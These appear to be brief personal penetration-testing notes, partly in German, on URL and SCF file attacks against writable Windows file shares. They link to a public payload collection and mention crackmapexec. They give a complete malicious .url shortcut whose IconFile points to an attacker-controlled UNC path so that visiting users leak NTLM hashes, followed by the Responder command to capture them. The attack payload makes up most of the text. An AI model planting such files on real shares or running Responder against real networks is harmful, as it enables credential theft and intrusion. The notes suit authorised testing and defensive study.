shared and windows shortcuts
URL file attacks
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share
- can be automated with crackmapexec
- try to get responder hashes
- after-compromise or an open-fileshare
- scf attack? url attack
- ”@test.url” oder “~test.url”
- inhalt:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
- open responder and wait, responder -I <interface> -v